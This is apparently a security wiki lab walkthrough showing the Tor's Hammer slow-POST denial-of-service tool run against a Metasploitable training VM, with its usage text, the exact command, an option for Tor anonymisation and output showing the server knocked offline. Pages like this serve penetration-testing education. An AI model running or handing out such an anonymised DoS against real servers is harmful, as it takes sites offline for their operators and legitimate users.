Tor's Hammer is a Python script for creating denial of service attacks on websites. It is designed to be used through the Tor traffic anonymization tool.
Contents
- 1 Tor's Hammer Slow Body DoS Attack
- 1.1 Python Script
- 1.2 Results
- 1.3 Bringing Down The Server
- 1.3.1 Ping Down
- 1.3.2 Memory Squeeze
- 2 pwn
- 3 Flags
- 3.1 DoS
- 3.2 Metasploitable
Tor's Hammer (https://sourceforge.net/projects/torshammer/) is a tool that uses the slow body attack to swamp Apache servers and cause a denial of service DoS. It does this by sending a POST request with a large declared content-length (like 1000 MB), then performing the following, ad infinitum: send one letter through the open connection; take a nap.
Tor's Hammer, in particular, provides a Python script that enables running the slow body attack through a web proxy like Tor, to provide anonymity. It also implements other disguising elements like a slew of User Agent headers.
We'll test this tool out on the Metasploitable machine, which is running Apache 2.2.8, and see if it is vulnerable to the Tor's Hammer DoS attack. If so, we'll mount the attack.
NOTE: This will completely knock out the target server. The web server will run out of memory and will begin to drop packets from the device. It must be rebooted to fix. Use wisely.
Python Script
To run this attack, use the torshammer.py script from the link above.
$ python torshammer.py/* * Tor's Hammer * Slow POST DoS Testing Tool * Version 1.0 Beta * Anon-ymized via Tor */./torshammer.py -t <target> [-r <threads> -p <port> -T -h] -t|--target <Hostname|IP> -r|--threads <Number of threads> Defaults to 256 -p|--port <Web Server Port> Defaults to 80 -T|--tor Enable anonymising through tor on 127.0.0.1:9050 -h|--help Shows this helpEg. ./torshammer.py -t 192.168.1.100 -r 256
Run this against the IP address of the Metasploitable machine, 10.0.0.27:
# python torshammer.py -t 10.0.0.27
This will run with the default number of threads (256).
Results
This works like a charm, bringing the target 10.0.0.27 to its knees:
Bingo!
Note that there are a large number of errors printed,
error: [Errno 24] Too many open filesThread broken, restarting...Exception in thread Thread-1:Traceback (most recent call last): File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner File "torshammer.py", line 112, in run File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__ File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__error: [Errno 24] Too many open filesThread broken, restarting...Exception in thread Thread-65:Traceback (most recent call last): File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner File "torshammer.py", line 112, in run File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__ File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__error: [Errno 24] Too many open filesThread broken, restarting...Exception in thread Thread-17:Traceback (most recent call last): File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner File "torshammer.py", line 112, in run File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__ File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
However, these don't seem to affect the attack, as the web server is inaccessible even while the error messages are being printed out.
Bringing Down The Server
Ping Down
At some point during the attack, the machine stopped responding to ping:
ping: sendto: Host is downRequest timeout for icmp_seq 874ping: sendto: Host is downRequest timeout for icmp_seq 875ping: sendto: Host is downRequest timeout for icmp_seq 876ping: sendto: Host is downRequest timeout for icmp_seq 877ping: sendto: Host is downRequest timeout for icmp_seq 878ping: sendto: Host is downRequest timeout for icmp_seq 879ping: sendto: Host is downRequest timeout for icmp_seq 880ping: sendto: Host is downRequest timeout for icmp_seq 881ping: sendto: Host is downRequest timeout for icmp_seq 882ping: sendto: Host is downRequest timeout for icmp_seq 883ping: sendto: Host is downRequest timeout for icmp_seq 884ping: sendto: Host is downRequest timeout for icmp_seq 885ping: sendto: Host is downRequest timeout for icmp_seq 886ping: sendto: Host is downRequest timeout for icmp_seq 887ping: sendto: Host is downRequest timeout for icmp_seq 888ping: sendto: Host is downRequest timeout for icmp_seq 889ping: sendto: Host is downRequest timeout for icmp_seq 890ping: sendto: Host is downRequest timeout for icmp_seq 891ping: sendto: Host is downRequest timeout for icmp_seq 892Request timeout for icmp_seq 893Request timeout for icmp_seq 894Request timeout for icmp_seq 895Request timeout for icmp_seq 896Request timeout for icmp_seq 897Request timeout for icmp_seq 898Request timeout for icmp_seq 899Request timeout for icmp_seq 900Request timeout for icmp_seq 901Request timeout for icmp_seq 902Request timeout for icmp_seq 903Request timeout for icmp_seq 904Request timeout for icmp_seq 905Request timeout for icmp_seq 906Request timeout for icmp_seq 907
Memory Squeeze
Turns out, the machine ran out of memory, and the network device began dropping packets:
This attack completely knocked the server offline, and it had to be rebooted.
To be sure: this attack can pwn a server.
DoS
Denial of Service denial of service attacks for denying users access to resources that they are otherwise entitled to access.DoS DoS at Layers 1 and 2: Layer 1 and 2 DoS Attacks CAM Table Overflow/MAC Flood: DoS/Mac Flood CAM Table Poisoning: DoS/Cam Poisoning DoS at Layers 3 and 4: Layer 3 and 4 DoS Attacks Syn Flood: DoS/SYN Flood Smurf Attack (Ping Flood): DoS/Smurf Attack DNS Attacks: DoS/DNS DNSSmurf Attack: DoS/DNSSmurf Wormhole Attack: DoS/Wormhole Attack Black Hole Attack: DoS/Black Hole Attack Byzantine Attack: DoS/Byzantine Attack Sleep Deprivation Attack: DoS/Sleep Deprivation Attack Stale Packets: DoS/Stale Packets Toolz: Hping · Macof · Tcpnice · Hammer · Tors Hammer Category:DoS · Category:Attacks · Category:Kali Attack Layers Flags · Template:DoSFlag · e |
Metasploitable
Metasploit any and all resources related to metasploit on this wiki
Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload. Category:Security · Category:Metasploit · Category:Kali Flags · Template:MetasploitFlag · e |
Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind Metasploitable Services: distcc: Metasploitable/distcc Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...) Fuzzing · American Fuzzy Lop Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali Flags · Template:MetasploitableRedTeamFlag · e |
Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports
Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort
|